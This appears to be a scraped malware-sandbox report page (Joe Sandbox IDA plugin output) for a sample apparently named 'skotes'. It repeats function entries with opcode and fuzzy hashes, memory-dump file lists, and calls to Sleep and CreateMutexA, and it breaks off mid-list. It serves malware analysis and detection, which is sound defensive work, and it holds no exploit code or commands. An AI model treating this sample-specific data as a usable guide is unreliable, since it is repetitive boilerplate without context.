Associated: 00000003.00000002.1391941571.00000000012AD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391961642.00000000012BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391980983.00000000012BB000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fb0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: e8acb279bb6176dc02beb7da2064080ce44f3e7c73488026d5fe8003c69c2aaf
Instruction ID: 237fc088c559fc91a994037e333e4c1c9d91a1cbe8a0ba9fed88bc6021b932b9
Opcode Fuzzy Hash: e8acb279bb6176dc02beb7da2064080ce44f3e7c73488026d5fe8003c69c2aaf
Instruction Fuzzy Hash: 1A312831B001019BEB189B7DDD89BEDB762AF86320F24421DE0149B2D5D77A8980EF16

Function 00FBA418 Relevance: 3.1, APIs: 2, Instructions: 133
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00FBA963
CreateMutexA.KERNELBASE(00000000,00000000,01013254), ref: 00FBA981

Memory Dump Source

Source File: 00000003.00000002.1390808577.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000003.00000002.1390780269.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1390808577.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1390901310.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1390925797.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1390951187.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1390983955.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391005427.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391172402.000000000117F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391199282.0000000001182000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391236924.0000000001192000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391236924.000000000119D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391292363.00000000011A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391319218.00000000011A8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391344720.00000000011B2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391367124.00000000011B8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391394401.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391413567.00000000011CE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391437813.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391458864.00000000011E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391486372.00000000011FB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391506310.0000000001201000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391526256.0000000001202000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391549522.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391567777.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391590106.000000000120B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391610638.000000000121A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391630415.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391650653.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391674296.000000000122F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391695977.0000000001230000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391716314.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391735889.0000000001233000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391755164.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391779653.000000000124A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391800236.000000000124B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391800236.0000000001279000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391853854.00000000012A4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391875035.00000000012A5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391900756.00000000012A6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391921750.00000000012AA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391941571.00000000012AD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391961642.00000000012BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391980983.00000000012BB000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fb0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: db70f93e516ff63845a118d71752d1936842cedbb517f6859229ffb0cff83413
Instruction ID: b1cdb3ca0128087f883bfbbc21d39ff5b1652f2812b373de23dd36a5e98f19d1
Opcode Fuzzy Hash: db70f93e516ff63845a118d71752d1936842cedbb517f6859229ffb0cff83413
Instruction Fuzzy Hash: CE311531B001409BEB18EB7DDD8DBEDB662EB81320F244218E054DB2D5D7BA8984EF56

Function 00FBA54D Relevance: 3.1, APIs: 2, Instructions: 132
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00FBA963
CreateMutexA.KERNELBASE(00000000,00000000,01013254), ref: 00FBA981

Memory Dump Source

Source File: 00000003.00000002.1390808577.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000003.00000002.1390780269.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1390808577.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1390901310.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1390925797.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1390951187.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1390983955.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391005427.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391172402.000000000117F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391199282.0000000001182000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391236924.0000000001192000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391236924.000000000119D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391292363.00000000011A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391319218.00000000011A8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391344720.00000000011B2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391367124.00000000011B8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391394401.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391413567.00000000011CE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391437813.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391458864.00000000011E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391486372.00000000011FB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391506310.0000000001201000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391526256.0000000001202000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391549522.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391567777.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391590106.000000000120B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391610638.000000000121A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391630415.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391650653.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391674296.000000000122F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391695977.0000000001230000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391716314.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391735889.0000000001233000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391755164.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391779653.000000000124A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391800236.000000000124B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391800236.0000000001279000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391853854.00000000012A4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391875035.00000000012A5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391900756.00000000012A6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391921750.00000000012AA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391941571.00000000012AD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391961642.00000000012BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391980983.00000000012BB000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fb0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 33ac14c72989e3b033b68f31ee56ec875b06ef20056e9a943f97b2f1105d7f79
Instruction ID: 306e9476e2dac1f23a1027cf063d6bf31c10d4f6aecf0b4e485f729040996c99
Opcode Fuzzy Hash: 33ac14c72989e3b033b68f31ee56ec875b06ef20056e9a943f97b2f1105d7f79
Instruction Fuzzy Hash: A0312871B001018BEB18DB7DDD89BEDB762EB85324F24421CE054DB2D5CB798980EF16

Function 00FBA682 Relevance: 3.1, APIs: 2, Instructions: 131
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00FBA963
CreateMutexA.KERNELBASE(00000000,00000000,01013254), ref: 00FBA981

Memory Dump Source

Source File: 00000003.00000002.1390808577.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000003.00000002.1390780269.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1390808577.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1390901310.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1390925797.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1390951187.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1390983955.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391005427.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391172402.000000000117F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391199282.0000000001182000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391236924.0000000001192000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391236924.000000000119D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391292363.00000000011A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391319218.00000000011A8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391344720.00000000011B2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391367124.00000000011B8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391394401.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391413567.00000000011CE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391437813.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391458864.00000000011E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391486372.00000000011FB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391506310.0000000001201000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391526256.0000000001202000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391549522.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391567777.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391590106.000000000120B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391610638.000000000121A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391630415.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391650653.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391674296.000000000122F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391695977.0000000001230000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391716314.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391735889.0000000001233000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391755164.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391779653.000000000124A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391800236.000000000124B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391800236.0000000001279000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391853854.00000000012A4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391875035.00000000012A5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391900756.00000000012A6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391921750.00000000012AA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391941571.00000000012AD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391961642.00000000012BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391980983.00000000012BB000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fb0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: f705d3961c593f7cd758d9b4d71dac8c33d2e5f9f118a87eb94bb388c61bc2a9
Instruction ID: 56f5ae7f51bd933c4f50da7984546f94d28c31b3d0450f3d58f0f23d9c8e1f2e
Opcode Fuzzy Hash: f705d3961c593f7cd758d9b4d71dac8c33d2e5f9f118a87eb94bb388c61bc2a9
Instruction Fuzzy Hash: 5A312671B041009BEB189B79DDC9BEDB762EB85320F24821CE014DB2D5DB798980EF56

Function 00FB9ADC Relevance: 3.1, APIs: 2, Instructions: 107
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00FBA963
CreateMutexA.KERNELBASE(00000000,00000000,01013254), ref: 00FBA981

Memory Dump Source

Source File: 00000003.00000002.1390808577.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000003.00000002.1390780269.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1390808577.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1390901310.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1390925797.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1390951187.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1390983955.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391005427.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391172402.000000000117F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391199282.0000000001182000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391236924.0000000001192000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391236924.000000000119D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391292363.00000000011A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391319218.00000000011A8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391344720.00000000011B2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391367124.00000000011B8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391394401.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391413567.00000000011CE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391437813.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391458864.00000000011E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391486372.00000000011FB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391506310.0000000001201000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391526256.0000000001202000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391549522.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391567777.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391590106.000000000120B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391610638.000000000121A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391630415.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391650653.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391674296.000000000122F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391695977.0000000001230000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391716314.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391735889.0000000001233000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391755164.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391779653.000000000124A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391800236.000000000124B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391800236.0000000001279000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391853854.00000000012A4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391875035.00000000012A5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391900756.00000000012A6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391921750.00000000012AA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391941571.00000000012AD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391961642.00000000012BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391980983.00000000012BB000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fb0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 0c3c889ed4be2b40b70192e5194e98883ff73e1c9e786b7cb8a220c7ca99b5ee
Instruction ID: 28028b465742b3029b38d728d76e59731f6f5ac41485c4e6b27e2d39b15e50ee
Opcode Fuzzy Hash: 0c3c889ed4be2b40b70192e5194e98883ff73e1c9e786b7cb8a220c7ca99b5ee
Instruction Fuzzy Hash: 77216E327042019BEB18AB6DDCC9BACF761EBC1321F20421DE558DB2D5D7BA5940EF11

Function 00FBA856 Relevance: 3.1, APIs: 2, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00FBA963
CreateMutexA.KERNELBASE(00000000,00000000,01013254), ref: 00FBA981

Memory Dump Source

Source File: 00000003.00000002.1390808577.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000003.00000002.1390780269.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1390808577.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1390901310.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1390925797.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1390951187.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1390983955.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391005427.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391172402.000000000117F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391199282.0000000001182000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391236924.0000000001192000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391236924.000000000119D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391292363.00000000011A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391319218.00000000011A8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391344720.00000000011B2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391367124.00000000011B8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391394401.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391413567.00000000011CE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391437813.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391458864.00000000011E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391486372.00000000011FB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391506310.0000000001201000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391526256.0000000001202000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391549522.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391567777.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391590106.000000000120B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391610638.000000000121A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391630415.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391650653.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391674296.000000000122F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391695977.0000000001230000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391716314.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391735889.0000000001233000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391755164.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391779653.000000000124A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391800236.000000000124B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391800236.0000000001279000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391853854.00000000012A4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391875035.00000000012A5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391900756.00000000012A6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391921750.00000000012AA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391941571.00000000012AD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391961642.00000000012BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391980983.00000000012BB000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fb0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 0502300e76f9343bb03512885e1fc7a06f22d981009ff4f62ff34466474f8ebe
Instruction ID: 86d58957d7a7d093add447aabaccb38e1f5f19a2053c4b2ec86fd4b4f941d29f
Opcode Fuzzy Hash: 0502300e76f9343bb03512885e1fc7a06f22d981009ff4f62ff34466474f8ebe
Instruction Fuzzy Hash: D1213D31B452019AF724776BDC8A7FDB651AFC1320F24481AE148DA6D1D67E8841FE53

Function 00FBA34F Relevance: 3.1, APIs: 2, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00FBA963
CreateMutexA.KERNELBASE(00000000,00000000,01013254), ref: 00FBA981

Memory Dump Source

Source File: 00000003.00000002.1390808577.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000003.00000002.1390780269.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1390808577.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1390901310.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1390925797.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1390951187.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1390983955.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391005427.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391172402.000000000117F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391199282.0000000001182000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391236924.0000000001192000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391236924.000000000119D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391292363.00000000011A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391319218.00000000011A8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391344720.00000000011B2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391367124.00000000011B8000.00000040.00000001.01000000.00000007.sdmpDownload File
